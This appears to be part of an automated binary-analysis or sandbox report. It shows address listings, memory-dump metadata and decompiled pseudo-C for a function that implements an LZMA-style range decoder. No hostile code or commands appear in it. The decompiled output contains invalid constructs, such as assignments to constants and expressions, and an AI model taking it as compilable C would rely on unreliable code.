                                                  0x0040679d
                                                  0x00000000
                                                  0x0040679d
                                                  0x0040672b
                                                  0x00406731
                                                  0x00406734
                                                  0x00406737
                                                  0x0040673a
                                                  0x0040673d
                                                  0x00406740
                                                  0x00406743
                                                  0x00406746
                                                  0x00406749
                                                  0x0040674c
                                                  0x00406765
                                                  0x00406767
                                                  0x0040676a
                                                  0x0040676b
                                                  0x0040676e
                                                  0x00406770
                                                  0x00406773
                                                  0x00406775
                                                  0x00406777
                                                  0x0040677a
                                                  0x0040677c
                                                  0x0040677f
                                                  0x00406783
                                                  0x00406785
                                                  0x00406785
                                                  0x00406786
                                                  0x00406789
                                                  0x0040678c
                                                  0x0040674e
                                                  0x0040674e
                                                  0x00406756
                                                  0x0040675b
                                                  0x0040675d
                                                  0x00406760
                                                  0x00406760
                                                  0x0040678f
                                                  0x00406796
                                                  0x00406720
                                                  0x00406720
                                                  0x00406720
                                                  0x00406720
                                                  0x00000000
                                                  0x00406798
                                                  0x00000000
                                                  0x00406798
                                                  0x00406796
                                                  0x004066a9
                                                  0x004066ac
                                                  0x004066ae
                                                  0x004066b1
                                                  0x004066b4
                                                  0x004066b7
                                                  0x004066b9
                                                  0x004066bc
                                                  0x004066bf
                                                  0x004066bf
                                                  0x004066c2
                                                  0x004066c2
                                                  0x004066c5
                                                  0x004066cc
                                                  0x004066a0
                                                  0x004066a0
                                                  0x004066a0
                                                  0x004066a0
                                                  0x00000000
                                                  0x004066ce
                                                  0x00000000
                                                  0x004066ce
                                                  0x004066cc
                                                  0x00406652
                                                  0x00406655
                                                  0x00406657
                                                  0x0040665a
                                                  0x00000000
                                                  0x00000000
                                                  0x004063b9
                                                  0x004063b9
                                                  0x004063bd
                                                  0x00406a02
                                                  0x00000000
                                                  0x00406a02
                                                  0x004063c3
                                                  0x004063c6
                                                  0x004063c9
                                                  0x004063cc
                                                  0x004063cf
                                                  0x004063d2
                                                  0x004063d5
                                                  0x004063d7
                                                  0x004063da
                                                  0x004063dd
                                                  0x004063e0
                                                  0x004063e2
                                                  0x004063e2
                                                  0x004063e2
                                                  0x00000000
                                                  0x00000000
                                                  0x00000000
                                                  0x00000000
                                                  0x004067c1
                                                  0x004067c1
                                                  0x004067c1
                                                  0x004067c5
                                                  0x00000000
                                                  0x00000000
                                                  0x004067cb
                                                  0x004067ce
                                                  0x004067d1
                                                  0x004067d4
                                                  0x004067d6
                                                  0x004067d6
                                                  0x004067d6
                                                  0x004067d9
                                                  0x004067dc
                                                  0x004067df
                                                  0x004067e2
                                                  0x004067e5
                                                  0x004067e8
                                                  0x004067e9
                                                  0x004067eb
                                                  0x004067eb
                                                  0x004067eb
                                                  0x004067ee
                                                  0x004067f1
                                                  0x004067f4
                                                  0x004067f7
                                                  0x004067fa
                                                  0x004067fe
                                                  0x00406800
                                                  0x00406803
                                                  0x00000000
                                                  0x00406805
                                                  0x00000000
                                                  0x00406805
                                                  0x00406803
                                                  0x00406a38
                                                  0x00000000
                                                  0x00000000
                                                  0x00406067

                                                  Memory Dump Source
                                                  • Source File: 00000001.00000002.366705430.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                  • Associated: 00000001.00000002.366701235.0000000000400000.00000002.00020000.sdmp Download File
                                                  • Associated: 00000001.00000002.366711989.0000000000407000.00000002.00020000.sdmp Download File
                                                  • Associated: 00000001.00000002.366716712.0000000000409000.00000004.00020000.sdmp Download File
                                                  • Associated: 00000001.00000002.366728837.0000000000422000.00000004.00020000.sdmp Download File
                                                  • Associated: 00000001.00000002.366732375.000000000042A000.00000004.00020000.sdmp Download File
                                                  • Associated: 00000001.00000002.366736772.000000000042D000.00000002.00020000.sdmp Download File
                                                  Similarity
                                                  • API ID:
                                                  • String ID:
                                                  • API String ID:
                                                  • Opcode ID: 7dec09a748792e581ac56a4790c1b6395b646ad41e7ca9f7da80e9268b46833e
                                                  • Instruction ID: 178f069459afe4b8f6f8f854f87fc4d5347ab2ec506c5a0858b6a976d85c5aaa
                                                  • Opcode Fuzzy Hash: 7dec09a748792e581ac56a4790c1b6395b646ad41e7ca9f7da80e9268b46833e
                                                  • Instruction Fuzzy Hash: 8E816871E00228CFDF24DFA8C8447ADBBB1FB45301F25816AD816BB281C7785A96DF44
                                                  Uniqueness

                                                  Uniqueness Score: -1.00%

                                                  Function 00406025, Relevance: 5.2, APIs: 4, Instructions: 198COMMON
                                                  Download Yara Rule
                                                  C-Code - Quality: 98%
                                                  			E00406025(void* __ecx) {
				void* _v8;
				void* _v12;
				signed int _v16;
				unsigned int _v20;
				signed int _v24;
				signed int _v28;
				signed int _v32;
				signed int _v36;
				signed int _v40;
				signed int _v44;
				signed int _v48;
				signed int _v52;
				signed int _v56;
				signed int _v60;
				signed int _v64;
				signed int _v68;
				signed int _v72;
				signed int _v76;
				signed int _v80;
				signed int _v84;
				signed int _v88;
				signed int _v92;
				signed int _v95;
				signed int _v96;
				signed int _v100;
				signed int _v104;
				signed int _v108;
				signed int _v112;
				signed int _v116;
				signed int _v120;
				intOrPtr _v124;
				signed int _v128;
				signed int _v132;
				signed int _v136;
				void _v140;
				void* _v148;
				signed int _t537;
				signed int _t538;
				signed int _t572;

				_t572 = 0x22;
				_v148 = __ecx;
				memcpy( &_v140, __ecx, _t572 << 2);
				if(_v52 == 0xffffffff) {
					return 1;
				}
				while(1) {
					L3:
					_t537 = _v140;
					if(_t537 > 0x1c) {
						break;
					}
					switch( *((intOrPtr*)(_t537 * 4 +  &M00406A77))) {
						case 0:
							__eflags = _v112;
							if(_v112 == 0) {
								goto L173;
							}
							_v112 = _v112 - 1;
							_v116 = _v116 + 1;
							_t537 =  *_v116;
							__eflags = _t537 - 0xe1;
							if(_t537 > 0xe1) {
								goto L174;
							}
							_t542 = _t537 & 0x000000ff;
							_push(0x2d);
							asm("cdq");
							_pop(_t576);
							_push(9);
							_pop(_t577);
							_t622 = _t542 / _t576;
							_t544 = _t542 % _t576 & 0x000000ff;
							asm("cdq");
							_t617 = _t544 % _t577 & 0x000000ff;
							_v64 = _t617;
							_v32 = (1 << _t622) - 1;
							_v28 = (1 << _t544 / _t577) - 1;
							_t625 = (0x300 << _t617 + _t622) + 0x736;
							__eflags = 0x600 - _v124;
							if(0x600 == _v124) {
								L12:
								__eflags = _t625;
								if(_t625 == 0) {
									L14:
									_v76 = _v76 & 0x00000000;
									_v68 = _v68 & 0x00000000;
									goto L17;
								} else {
									goto L13;
								}
								do {
									L13:
									_t625 = _t625 - 1;
									__eflags = _t625;
									 *((short*)(_v8 + _t625 * 2)) = 0x400;
								} while (_t625 != 0);
								goto L14;
							}
							__eflags = _v8;
							if(_v8 != 0) {
								GlobalFree(_v8);
							}
							_t537 = GlobalAlloc(0x40, 0x600); // executed
							__eflags = _t537;
							_v8 = _t537;
							if(_t537 == 0) {
								goto L174;
							} else {
								_v124 = 0x600;
								goto L12;
							}
						case 1:
							L15:
							__eflags = _v112;
							if(_v112 == 0) {
								_v140 = 1;
								goto L173;
							}
							_v112 = _v112 - 1;
							_v68 = _v68 | ( *_v116 & 0x000000ff) << _v76 << 0x00000003;
							_v116 = _v116 + 1;
							_t50 =  &_v76;
							 *_t50 = _v76 + 1;
							__eflags =  *_t50;
							L17:
							__eflags = _v76 - 4;
							if(_v76 < 4) {
								goto L15;
							}
							_t550 = _v68;
							__eflags = _t550 - _v120;
							if(_t550 == _v120) {
								L22:
								_v76 = 5;
								 *(_v12 + _v120 - 1) =  *(_v12 + _v120 - 1) & 0x00000000;
								goto L25;
							}
							__eflags = _v12;
							_v120 = _t550;
							if(_v12 != 0) {
								GlobalFree(_v12); // executed
							}
							_t537 = GlobalAlloc(0x40, _v68); // executed
							__eflags = _t537;
							_v12 = _t537;
							if(_t537 == 0) {
								goto L174;
							} else {
								goto L22;
							}
						case 2:
							L26:
							_t557 = _v100 & _v32;
							_v136 = 6;
							_v80 = _t557;
							_t626 = _v8 + ((_v60 << 4) + _t557) * 2;
							goto L135;
						case 3:
							L23:
							__eflags = _v112;
							if(_v112 == 0) {
								_v140 = 3;
								goto L173;
							}
							_v112 = _v112 - 1;
							_t72 =  &_v116;
							 *_t72 = _v116 + 1;
							__eflags =  *_t72;
							_v16 = _v16 << 0x00000008 |  *_v116 & 0x000000ff;
							L25:
							_v76 = _v76 - 1;
							__eflags = _v76;
							if(_v76 != 0) {
								goto L23;
							}
							goto L26;
						case 4:
							L136:
							_t559 =  *_t626;
							_t610 = _t559 & 0x0000ffff;
							_t591 = (_v20 >> 0xb) * _t610;
							__eflags = _v16 - _t591;
							if(_v16 >= _t591) {
								_v20 = _v20 - _t591;
								_v16 = _v16 - _t591;
								_v68 = 1;
								_t560 = _t559 - (_t559 >> 5);
								__eflags = _t560;
								 *_t626 = _t560;
							} else {
								_v20 = _t591;
								_v68 = _v68 & 0x00000000;
								 *_t626 = (0x800 - _t610 >> 5) + _t559;
							}
							__eflags = _v20 - 0x1000000;
							if(_v20 >= 0x1000000) {
								goto L142;
							} else {
								goto L140;
							}
						case 5:
							L140:
							__eflags = _v112;
							if(_v112 == 0) {
								_v140 = 5;
								goto L173;
							}
							_v20 = _v20 << 8;
							_v112 = _v112 - 1;
							_t464 =  &_v116;
							 *_t464 = _v116 + 1;
							__eflags =  *_t464;
							_v16 = _v16 << 0x00000008 |  *_v116 & 0x000000ff;
							L142:
							_t561 = _v136;
							goto L143;
						case 6:
							__edx = 0;
							__eflags = _v68;
							if(_v68 != 0) {
								__eax = _v8;
								__ecx = _v60;
								_v56 = 1;
								_v136 = 7;
								__esi = _v8 + 0x180 + _v60 * 2;
								goto L135;
							}
							__eax = _v96 & 0x000000ff;
							__esi = _v100;
							__cl = 8;
							__cl = 8 - _v64;
							__esi = _v100 & _v28;
							__eax = (_v96 & 0x000000ff) >> 8;
							__ecx = _v64;
							__esi = (_v100 & _v28) << 8;
							__ecx = _v8;
							((_v96 & 0x000000ff) >> 8) + ((_v100 & _v28) << 8) = ((_v96 & 0x000000ff) >> 8) + ((_v100 & _v28) << 8) + (((_v96 & 0x000000ff) >> 8) + ((_v100 & _v28) << 8)) * 2;
							__eax = ((_v96 & 0x000000ff) >> 8) + ((_v100 & _v28) << 8) + (((_v96 & 0x000000ff) >> 8) + ((_v100 & _v28) << 8)) * 2 << 9;
							__eflags = _v60 - 4;
							__eax = (((_v96 & 0x000000ff) >> 8) + ((_v100 & _v28) << 8) + (((_v96 & 0x000000ff) >> 8) + ((_v100 & _v28) << 8)) * 2 << 9) + _v8 + 0xe6c;
							_v92 = (((_v96 & 0x000000ff) >> 8) + ((_v100 & _v28) << 8) + (((_v96 & 0x000000ff) >> 8) + ((_v100 & _v28) << 8)) * 2 << 9) + _v8 + 0xe6c;
							if(_v60 >= 4) {
								__eflags = _v60 - 0xa;
								if(_v60 >= 0xa) {
									_t103 =  &_v60;
									 *_t103 = _v60 - 6;
									__eflags =  *_t103;
								} else {
									_v60 = _v60 - 3;
								}
							} else {
								_v60 = 0;
							}
							__eflags = _v56 - __edx;
							if(_v56 == __edx) {
								__ebx = 0;
								__ebx = 1;
								goto L63;
							}
							__eax = _v24;
							__eax = _v24 - _v48;
							__eflags = __eax - _v120;
							if(__eax >= _v120) {
								__eax = __eax + _v120;
								__eflags = __eax;
							}
							__ecx = _v12;
							__ebx = 0;
							__ebx = 1;
							__al =  *((intOrPtr*)(__eax + __ecx));
							_v95 =  *((intOrPtr*)(__eax + __ecx));
							goto L43;
						case 7:
							__eflags = _v68 - 1;
							if(_v68 != 1) {
								__eax = _v40;
								_v132 = 0x16;
								_v36 = _v40;
								__eax = _v44;
								_v40 = _v44;
								__eax = _v48;
								_v44 = _v48;
								__eax = 0;
								__eflags = _v60 - 7;
								0 | __eflags >= 0x00000000 = (__eflags >= 0) - 1;
								__al = __al & 0x000000fd;
								__eax = (__eflags >= 0) - 1 + 0xa;
								_v60 = (__eflags >= 0) - 1 + 0xa;
								__eax = _v8;
								__eax = _v8 + 0x664;
								__eflags = __eax;
								_v92 = __eax;
								goto L71;
							}
							__eax = _v8;
							__ecx = _v60;
							_v136 = 8;
							__esi = _v8 + 0x198 + _v60 * 2;
							goto L135;
						case 8:
							__eflags = _v68;
							if(_v68 != 0) {
								__eax = _v8;
								__ecx = _v60;
								_v136 = 0xa;
								__esi = _v8 + 0x1b0 + _v60 * 2;
							} else {
								__eax = _v60;
								__ecx = _v8;
								__eax = _v60 + 0xf;
								_v136 = 9;
								_v60 + 0xf << 4 = (_v60 + 0xf << 4) + _v80;
								__esi = _v8 + ((_v60 + 0xf << 4) + _v80) * 2;
							}
							goto L135;
						case 9:
							__eflags = _v68;
							if(_v68 != 0) {
								goto L92;
							}
							__eflags = _v100;
							if(_v100 == 0) {
								goto L174;
							}
							__eax = 0;
							__eflags = _v60 - 7;
							_t264 = _v60 - 7 >= 0;
							__eflags = _t264;
							0 | _t264 = _t264 + _t264 + 9;
							_v60 = _t264 + _t264 + 9;
							goto L78;
						case 0xa:
							__eflags = _v68;
							if(_v68 != 0) {
								__eax = _v8;
								__ecx = _v60;
								_v136 = 0xb;
								__esi = _v8 + 0x1c8 + _v60 * 2;
								goto L135;
							}
							__eax = _v44;
							goto L91;
						case 0xb:
							__eflags = _v68;
							if(_v68 != 0) {
								__ecx = _v40;
								__eax = _v36;
								_v36 = _v40;
							} else {
								__eax = _v40;
							}
							__ecx = _v44;
							_v40 = _v44;
							L91:
							__ecx = _v48;
							_v48 = __eax;
							_v44 = _v48;
							L92:
							__eax = _v8;
							_v132 = 0x15;
							__eax = _v8 + 0xa68;
							_v92 = _v8 + 0xa68;
							goto L71;
						case 0xc:
							L102:
							__eflags = _v112;
							if(_v112 == 0) {
								_v140 = 0xc;
								goto L173;
							}
							__ecx = _v116;
							__eax = _v16;
							_v20 = _v20 << 8;
							__ecx =  *_v116 & 0x000000ff;
							_v112 = _v112 - 1;
							_v16 << 8 = _v16 << 0x00000008 |  *_v116 & 0x000000ff;
							_t340 =  &_v116;
							 *_t340 = _v116 + 1;
							__eflags =  *_t340;
							_v16 = _v16 << 0x00000008 |  *_v116 & 0x000000ff;
							__eax = _v48;
							goto L104;
						case 0xd:
							L39:
							__eflags = _v112;
							if(_v112 == 0) {
								_v140 = 0xd;
								goto L173;
							}
							__ecx = _v116;
							__eax = _v16;
							_v20 = _v20 << 8;
							__ecx =  *_v116 & 0x000000ff;
							_v112 = _v112 - 1;
							_v16 << 8 = _v16 << 0x00000008 |  *_v116 & 0x000000ff;
							_t127 =  &_v116;
							 *_t127 = _v116 + 1;
							__eflags =  *_t127;
							_v16 = _v16 << 0x00000008 |  *_v116 & 0x000000ff;
							L41:
							__eax = _v68;
							__eflags = _v76 - _v68;
							if(_v76 != _v68) {
								goto L50;
							}
							__eflags = __ebx - 0x100;
							if(__ebx >= 0x100) {
								goto L56;
							}
							L43:
							__eax = _v95 & 0x000000ff;
							_v95 = _v95 << 1;
							__ecx = _v92;
							__eax = (_v95 & 0x000000ff) >> 7;
							_v76 = __eax;
							__eax = __eax + 1;
							__eax = __eax << 8;
							__eax = __eax + __ebx;
							__esi = _v92 + __eax * 2;
							_v20 = _v20 >> 0xb;
							__ax =  *__esi;
							_v88 = __esi;
							__edx = __ax & 0x0000ffff;
							__ecx = (_v20 >> 0xb) * __edx;
							__eflags = _v16 - __ecx;
							if(_v16 >= __ecx) {
								_v20 = _v20 - __ecx;
								_v16 = _v16 - __ecx;
								__cx = __ax;
								_v68 = 1;
								__cx = __ax >> 5;
								__eflags = __eax;
								__ebx = __ebx + __ebx + 1;
								 *__esi = __ax;
							} else {
								_v68 = _v68 & 0x00000000;
								_v20 = __ecx;
								0x800 = 0x800 - __edx;
								0x800 - __edx >> 5 = (0x800 - __edx >> 5) + __eax;
								__ebx = __ebx + __ebx;
								 *__esi = __cx;
							}
							__eflags = _v20 - 0x1000000;
							_v72 = __ebx;
							if(_v20 >= 0x1000000) {
								goto L41;
							} else {
								goto L39;
							}
						case 0xe:
							L48:
							__eflags = _v112;
							if(_v112 == 0) {
								_v140 = 0xe;
								goto L173;
							}
							__ecx = _v116;
							__eax = _v16;
							_v20 = _v20 << 8;
							__ecx =  *_v116 & 0x000000ff;
							_v112 = _v112 - 1;
							_v16 << 8 = _v16 << 0x00000008 |  *_v116 & 0x000000ff;
							_t161 =  &_v116;
							 *_t161 = _v116 + 1;
							__eflags =  *_t161;
							_v16 = _v16 << 0x00000008 |  *_v116 & 0x000000ff;
							while(1) {
								L50:
								__eflags = __ebx - 0x100;
								if(__ebx >= 0x100) {
									break;
								}
								__eax = _v92;
								__edx = __ebx + __ebx;
								__ecx = _v20;
								__esi = __edx + __eax;
								__ecx = _v20 >> 0xb;
								__ax =  *__esi;
								_v88 = __esi;
								__edi = __ax & 0x0000ffff;
								__ecx = (_v20 >> 0xb) * __edi;
								__eflags = _v16 - __ecx;
								if(_v16 >= __ecx) {
									_v20 = _v20 - __ecx;
									_v16 = _v16 - __ecx;
									__cx = __ax;
									_t175 = __edx + 1; // 0x1
									__ebx = _t175;
									__cx = __ax >> 5;
									__eflags = __eax;
									 *__esi = __ax;
								} else {
									_v20 = __ecx;
									0x800 = 0x800 - __edi;
									0x800 - __edi >> 5 = (0x800 - __edi >> 5) + __eax;
									__ebx = __ebx + __ebx;
									 *__esi = __cx;
								}
								__eflags = _v20 - 0x1000000;
								_v72 = __ebx;
								if(_v20 >= 0x1000000) {
									continue;
								} else {
									goto L48;
								}
							}
							L56:
							_t178 =  &_v56;
							 *_t178 = _v56 & 0x00000000;
							__eflags =  *_t178;
							goto L57;
						case 0xf:
							L60:
							__eflags = _v112;
							if(_v112 == 0) {
								_v140 = 0xf;
								goto L173;
							}
							__ecx = _v116;
							__eax = _v16;
							_v20 = _v20 << 8;
							__ecx =  *_v116 & 0x000000ff;
							_v112 = _v112 - 1;
							_v16 << 8 = _v16 << 0x00000008 |  *_v116 & 0x000000ff;
							_t208 =  &_v116;
							 *_t208 = _v116 + 1;
							__eflags =  *_t208;
							_v16 = _v16 << 0x00000008 |  *_v116 & 0x000000ff;
							L62:
							__eflags = __ebx - 0x100;
							if(__ebx >= 0x100) {
								L57:
								__al = _v72;
								_v96 = _v72;
								goto L58;
							}
							L63:
							__eax = _v92;
							__edx = __ebx + __ebx;
							__ecx = _v20;
							__esi = __edx + __eax;
							__ecx = _v20 >> 0xb;
							__ax =  *__esi;
							_v88 = __esi;
							__edi = __ax & 0x0000ffff;
							__ecx = (_v20 >> 0xb) * __edi;
							__eflags = _v16 - __ecx;
							if(_v16 >= __ecx) {
								_v20 = _v20 - __ecx;
								_v16 = _v16 - __ecx;
								__cx = __ax;
								_t222 = __edx + 1; // 0x1
								__ebx = _t222;
								__cx = __ax >> 5;
								__eflags = __eax;
								 *__esi = __ax;
							} else {
								_v20 = __ecx;
								0x800 = 0x800 - __edi;
								0x800 - __edi >> 5 = (0x800 - __edi >> 5) + __eax;
								__ebx = __ebx + __ebx;
								 *__esi = __cx;
							}
							__eflags = _v20 - 0x1000000;
							_v72 = __ebx;
							if(_v20 >= 0x1000000) {
								goto L62;
							} else {
								goto L60;
							}
						case 0x10:
							L112:
							__eflags = _v112;
							if(_v112 == 0) {
								_v140 = 0x10;
								goto L173;
							}
							__ecx = _v116;
							__eax = _v16;
							_v20 = _v20 << 8;
							__ecx =  *_v116 & 0x000000ff;
							_v112 = _v112 - 1;
							_v16 << 8 = _v16 << 0x00000008 |  *_v116 & 0x000000ff;
							_t371 =  &_v116;
							 *_t371 = _v116 + 1;
							__eflags =  *_t371;
							_v16 = _v16 << 0x00000008 |  *_v116 & 0x000000ff;
							goto L114;
						case 0x11:
							L71:
							__esi = _v92;
							_v136 = 0x12;
							goto L135;
						case 0x12:
							__eflags = _v68;
							if(_v68 != 0) {
								__eax = _v92;
								_v136 = 0x13;
								__esi = _v92 + 2;
								L135:
								_v88 = _t626;
								goto L136;
							}
							__eax = _v80;
							_v52 = _v52 & 0x00000000;
							__ecx = _v92;
							__eax = _v80 << 4;
							__eflags = __eax;
							__eax = _v92 + __eax + 4;
							goto L133;
						case 0x13:
							__eflags = _v68;
							if(_v68 != 0) {
								_t475 =  &_v92;
								 *_t475 = _v92 + 0x204;
								__eflags =  *_t475;
								_v52 = 0x10;
								_v68 = 8;
								L147:
								_v128 = 0x14;
								goto L148;
							}
							__eax = _v80;
							__ecx = _v92;
							__eax = _v80 << 4;
							_v52 = 8;
							__eax = _v92 + (_v80 << 4) + 0x104;
							L133:
							_v92 = __eax;
							_v68 = 3;
							goto L147;
						case 0x14:
							_v52 = _v52 + __ebx;
							__eax = _v132;
							goto L143;
						case 0x15:
							__eax = 0;
							__eflags = _v60 - 7;
							0 | __eflags >= 0x00000000 = (__eflags >= 0) - 1;
							__al = __al & 0x000000fd;
							__eax = (__eflags >= 0) - 1 + 0xb;
							_v60 = (__eflags >= 0) - 1 + 0xb;
							goto L123;
						case 0x16:
							__eax = _v52;
							__eflags = __eax - 4;
							if(__eax >= 4) {
								_push(3);
								_pop(__eax);
							}
							__ecx = _v8;
							_v68 = 6;
							__eax = __eax << 7;
							_v128 = 0x19;
							_v92 = __eax;
							goto L148;
						case 0x17:
							L148:
							__eax = _v68;
							_v84 = 1;
							_v76 = _v68;
							goto L152;
						case 0x18:
							L149:
							__eflags = _v112;
							if(_v112 == 0) {
								_v140 = 0x18;
								goto L173;
							}
							__ecx = _v116;
							__eax = _v16;
							_v20 = _v20 << 8;
							__ecx =  *_v116 & 0x000000ff;
							_v112 = _v112 - 1;
							_v16 << 8 = _v16 << 0x00000008 |  *_v116 & 0x000000ff;
							_t490 =  &_v116;
							 *_t490 = _v116 + 1;
							__eflags =  *_t490;
							_v16 = _v16 << 0x00000008 |  *_v116 & 0x000000ff;
							L151:
							_t493 =  &_v76;
							 *_t493 = _v76 - 1;
							__eflags =  *_t493;
							L152:
							__eflags = _v76;
							if(_v76 <= 0) {
								__ecx = _v68;
								__ebx = _v84;
								0 = 1;
								__eax = 1 << __cl;
								__ebx = _v84 - (1 << __cl);
								__eax = _v128;
								_v72 = __ebx;
								L143:
								_v140 = _t561;
								goto L3;
							}
							__eax = _v84;
							_v20 = _v20 >> 0xb;
							__edx = _v84 + _v84;
							__eax = _v92;
							__esi = __edx + __eax;
							_v88 = __esi;
							__ax =  *__esi;
							__edi = __ax & 0x0000ffff;
							__ecx = (_v20 >> 0xb) * __edi;
							__eflags = _v16 - __ecx;
							if(_v16 >= __ecx) {
								_v20 = _v20 - __ecx;
								_v16 = _v16 - __ecx;
								__cx = __ax;
								__cx = __ax >> 5;
								__eax = __eax - __ecx;
								__edx = __edx + 1;
								__eflags = __edx;
								 *__esi = __ax;
								_v84 = __edx;
							} else {
								_v20 = __ecx;
								0x800 = 0x800 - __edi;
								0x800 - __edi >> 5 = (0x800 - __edi >> 5) + __eax;
								_v84 = _v84 << 1;
								 *__esi = __cx;
							}
							__eflags = _v20 - 0x1000000;
							if(_v20 >= 0x1000000) {
								goto L151;
							} else {
								goto L149;
							}
						case 0x19:
							__eflags = __ebx - 4;
							if(__ebx < 4) {
								_v48 = __ebx;
								L122:
								_t399 =  &_v48;
								 *_t399 = _v48 + 1;
								__eflags =  *_t399;
								L123:
								__eax = _v48;
								__eflags = __eax;
								if(__eax == 0) {
									_v52 = _v52 | 0xffffffff;
									goto L173;
								}
								__eflags = __eax - _v100;
								if(__eax > _v100) {
									goto L174;
								}
								_v52 = _v52 + 2;
								__eax = _v52;
								_t406 =  &_v100;
								 *_t406 = _v100 + _v52;
								__eflags =  *_t406;
								goto L126;
							}
							__ecx = __ebx;
							__eax = __ebx;
							__ecx = __ebx >> 1;
							__eax = __ebx & 0x00000001;
							__ecx = (__ebx >> 1) - 1;
							__al = __al | 0x00000002;
							__eax = (__ebx & 0x00000001) << __cl;
							__eflags = __ebx - 0xe;
							_v48 = __eax;
							if(__ebx >= 0xe) {
								__ebx = 0;
								_v76 = __ecx;
								L105:
								__eflags = _v76;
								if(_v76 <= 0) {
									__eax = __eax + __ebx;
									_v68 = 4;
									_v48 = __eax;
									__eax = _v8;
									__eax = _v8 + 0x644;
									__eflags = __eax;
									L111:
									__ebx = 0;
									_v92 = __eax;
									_v84 = 1;
									_v72 = 0;
									_v76 = 0;
									L115:
									__eax = _v68;
									__eflags = _v76 - _v68;
									if(_v76 >= _v68) {
										_t397 =  &_v48;
										 *_t397 = _v48 + __ebx;
										__eflags =  *_t397;
										goto L122;
									}
									__eax = _v84;
									_v20 = _v20 >> 0xb;
									__edi = _v84 + _v84;
									__eax = _v92;
									__esi = __edi + __eax;
									_v88 = __esi;
									__ax =  *__esi;
									__ecx = __ax & 0x0000ffff;
									__edx = (_v20 >> 0xb) * __ecx;
									__eflags = _v16 - __edx;
									if(_v16 >= __edx) {
										__ecx = 0;
										_v20 = _v20 - __edx;
										__ecx = 1;
										_v16 = _v16 - __edx;
										__ebx = 1;
										__ecx = _v76;
										__ebx = 1 << __cl;
										__ecx = 1 << __cl;
										__ebx = _v72;
										__ebx = _v72 | __ecx;
										__cx = __ax;
										__cx = __ax >> 5;
										__eax = __eax - __ecx;
										__edi = __edi + 1;
										__eflags = __edi;
										_v72 = __ebx;
										 *__esi = __ax;
										_v84 = __edi;
									} else {
										_v20 = __edx;
										0x800 = 0x800 - __ecx;
										0x800 - __ecx >> 5 = (0x800 - __ecx >> 5) + __eax;
										_v84 = _v84 << 1;
										 *__esi = __dx;
									}
									__eflags = _v20 - 0x1000000;
									if(_v20 >= 0x1000000) {
										L114:
										_t374 =  &_v76;
										 *_t374 = _v76 + 1;
										__eflags =  *_t374;
										goto L115;
									} else {
										goto L112;
									}
								}
								__ecx = _v16;
								__ebx = __ebx + __ebx;
								_v20 = _v20 >> 1;
								__eflags = _v16 - _v20;
								_v72 = __ebx;
								if(_v16 >= _v20) {
									__ecx = _v20;
									_v16 = _v16 - _v20;
									__ebx = __ebx | 0x00000001;
									__eflags = __ebx;
									_v72 = __ebx;
								}
								__eflags = _v20 - 0x1000000;
								if(_v20 >= 0x1000000) {
									L104:
									_t344 =  &_v76;
									 *_t344 = _v76 - 1;
									__eflags =  *_t344;
									goto L105;
								} else {
									goto L102;
								}
							}
							__edx = _v8;
							__eax = __eax - __ebx;
							_v68 = __ecx;
							__eax = _v8 + 0x55e + __eax * 2;
							goto L111;
						case 0x1a:
							L58:
							__eflags = _v104;
							if(_v104 == 0) {
								_v140 = 0x1a;
								goto L173;
							}
							__ecx = _v108;
							__al = _v96;
							__edx = _v12;
							_v100 = _v100 + 1;
							_v108 = _v108 + 1;
							_v104 = _v104 - 1;
							 *_v108 = __al;
							__ecx = _v24;
							 *(_v12 + __ecx) = __al;
							__eax = __ecx + 1;
							__edx = 0;
							_t197 = __eax % _v120;
							__eax = __eax / _v120;
							__edx = _t197;
							goto L82;
						case 0x1b:
							L78:
							__eflags = _v104;
							if(_v104 == 0) {
								_v140 = 0x1b;
								goto L173;
							}
							__eax = _v24;
							__eax = _v24 - _v48;
							__eflags = __eax - _v120;
							if(__eax >= _v120) {
								__eax = __eax + _v120;
								__eflags = __eax;
							}
							__edx = _v12;
							__cl =  *(__edx + __eax);
							__eax = _v24;
							_v96 = __cl;
							 *(__edx + __eax) = __cl;
							__eax = __eax + 1;
							__edx = 0;
							_t280 = __eax % _v120;
							__eax = __eax / _v120;
							__edx = _t280;
							__eax = _v108;
							_v100 = _v100 + 1;
							_v108 = _v108 + 1;
							_t289 =  &_v104;
							 *_t289 = _v104 - 1;
							__eflags =  *_t289;
							 *_v108 = __cl;
							L82:
							_v24 = __edx;
							goto L83;
						case 0x1c:
							while(1) {
								L126:
								__eflags = _v104;
								if(_v104 == 0) {
									break;
								}
								__eax = _v24;
								__eax = _v24 - _v48;
								__eflags = __eax - _v120;
								if(__eax >= _v120) {
									__eax = __eax + _v120;
									__eflags = __eax;
								}
								__edx = _v12;
								__cl =  *(__edx + __eax);
								__eax = _v24;
								_v96 = __cl;
								 *(__edx + __eax) = __cl;
								__eax = __eax + 1;
								__edx = 0;
								_t420 = __eax % _v120;
								__eax = __eax / _v120;
								__edx = _t420;
								__eax = _v108;
								_v108 = _v108 + 1;
								_v104 = _v104 - 1;
								_v52 = _v52 - 1;
								__eflags = _v52;
								 *_v108 = __cl;
								_v24 = _t420;
								if(_v52 > 0) {
									continue;
								} else {
									L83:
									_v140 = 2;
									goto L3;
								}
							}
							_v140 = 0x1c;
							L173:
							_push(0x22);
							_pop(_t574);
							memcpy(_v148,  &_v140, _t574 << 2);
							return 0;
					}
				}
				L174:
				_t538 = _t537 | 0xffffffff;
				return _t538;
			}










































                                                  0x00406035
                                                  0x0040603c
                                                  0x00406042
                                                  0x00406048
                                                  0x00000000
                                                  0x0040604c
                                                  0x00406058
                                                  0x00406058
                                                  0x00406058
                                                  0x00406061
                                                  0x00000000
                                                  0x00000000
                                                  0x00406067
                                                  0x00000000
                                                  0x0040606e
                                                  0x00406072
                                                  0x00000000
                                                  0x00000000
                                                  0x0040607b
                                                  0x0040607e
                                                  0x00406081
                                                  0x00406083
                                                  0x00406085
                                                  0x00000000
                                                  0x00000000
                                                  0x0040608b
                                                  0x0040608e
                                                  0x00406090
                                                  0x00406091
                                                  0x00406094
                                                  0x00406096
                                                  0x00406097
                                                  0x00406099
                                                  0x0040609c
                                                  0x004060a1
                                                  0x004060a6
                                                  0x004060af
                                                  0x004060c2
                                                  0x004060c5
                                                  0x004060ce
                                                  0x004060d1
                                                  0x004060f9
                                                  0x004060f9
                                                  0x004060fb
                                                  0x00406109
                                                  0x00406109
                                                  0x0040610d
                                                  0x00000000
                                                  0x00000000
                                                  0x00000000
                                                  0x00000000
                                                  0x004060fd
                                                  0x004060fd
                                                  0x00406100
                                                  0x00406100
                                                  0x00406101
                                                  0x00406101
                                                  0x00000000
                                                  0x004060fd
